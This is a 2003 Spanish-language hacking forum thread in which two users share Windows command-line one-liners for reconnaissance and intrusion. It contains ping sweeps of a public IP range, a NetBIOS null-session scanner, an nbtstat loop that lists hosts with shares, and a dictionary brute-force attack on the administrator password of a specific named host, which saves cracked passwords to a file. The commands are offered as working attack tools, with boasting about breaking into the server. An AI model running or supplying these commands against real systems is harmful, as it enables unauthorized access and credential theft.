Vic_Thor

Super Miembro HXC

Publicado: Sab May 10, 2003 9:56 pm Asunto: Escanear ips a travez de ms-dos?

Escaner cutre de ip's usando ping

FOR /L %i IN (1,1,254) DO ping 80.36.230.%i >>escaner.txt

esto escanerá las ip's del rango 80.36.230.1 a 254 y vuelca el contenido en el fichero escaner.txt,
prepárate a leerlo, bueno con un editor puedes filtrar las respuestas positivas

Versión mejorada jaja

FOR /L %i IN (1,1,254) DO echo %time% %date%>>escaner.txt && ping -n 1 80.36.230.%i

>>escaner.txt

lo mismo pero con fecha y hora y con un sola petición de eco (no cuatro)

EScaner Netbios xDDDD

FOR /L %i IN (235,1,254) DO net use \\80.36.230.%i\ipc$ "" /u:"" 2>> nul && echo
%date% >> escaner.txt && echo 80.36.230.%i >>escaner.txt

Super!!! si puede establecer una sesión nula la escribe en escaner.txt, si no redirije la salida a nul,
demasiao p'al cuerpo.

Vamos mejor lo dejamos

PD fíjate que en el último caso empieza por la dirección del server de pruebas de HxC, para que al
menos tengas una sin problemas

Escríbelo tal cual, o lo copias y lo pegas en la línea de comandos, no pulses enter hasta finalizar todo, si
no hay que poner los gorritos ^

Bueno, y ya puestos a escanear con la shell, tatachaaaannn

ATAQUE A NETBIOS POR DICCIONARIO, hala! a por la clave del

administrador.....
Se supone que existe un archivo que se llama claves.txt con un buen diccionario de palabras....

FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador

Esto no para, mal asunto....

vamos a guardar la password, si la encontramos en un fichero llamado pass.txt

FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador && echo

clave: %i >> pass.txt

Y si no queremos ver las salidas erroneas dentro del fichero....

FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador 2>>nul &&

echo clave: %i >> pass.txt

Pues nada, ya sólo queda encontrar un buen diccionario y a asaltar el server de pruebas, que me parece
que hay premio para el que lo consiga...

uuuuuuuuuuuy, que se me fue la olla. Vaya tela! pero FUNCIONA!!!! amig@s

Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

Seoman
Gran Miembro HXC

Publicado: Dom May 11, 2003 11:02 pm Asunto:

Como el tema es muy interesante, y utilizando lo que a dejado Vic_Thor, sus

dejo esto, haver que os parece:

Código:
FOR /L %i IN (1,1,254) DO ping 192.168.0.%i -n 1|find "Respuesta
desde">>escaner.txt

Que hace esto, pues sastamente lo mismo que el ping del Vic_Thor, pero este
solo mete en el txt, los que responden al ping

Algo un poco mas util que el de antes

-------------------------------------------

Código:
FOR /L %i IN (1,1,254) DO if Errorlevel = 0 ping 192.168.1.%i -n
1|find "Respuesta desde" && echo 192.168.1.%i >>escaner.txt

Que hace? Este es mas interesante... El if tiene una opcion (help if) que es el
errorlevel. Esto es el codigo que retorna el programa una vez se a ejecutado.
Usease, puede retornar un 0 si se a ejecutado correctamente, un 1 si ha fallado
en una cosa, un 2 si ha fallado en otra, etc... El ping retorna un 0 si encuentra
la ip, asi que obtenemos?Si una vez ejecutado el for, haceis un type escaner.txt
obtendreis un resultado algo asi como:

Código:
C:\>type escaner.txt
192.168.1.1
192.168.1.2
192.168.1.3

Y ahora os preguntareis... Pq tanto rollo de if si con lo que dava el otro, ya

sabia las ips que estaban "en linia". Pues para poder realizar lo siguiente:

Código:
FOR /F %i IN (escaner.txt) DO if Errorlevel = 0 nbtstat -a %i|find
"<20>" &
& echo %i >>netbios.txt

Bueno bueno, y este que hace?? Pues parecido al anterior, pero mete en el
fichero de texto netbios.txt, las ip's de los que tienen algo compartido. el
comando nbtstat, retorna un listado de recursos, y si hay un recurso
compartido, lo marca con un <20>.

Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

Pues ale, espero que os cunda ^^. No se si servira de algo, pero gueno, ahi lo
dejo jejeje.

Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"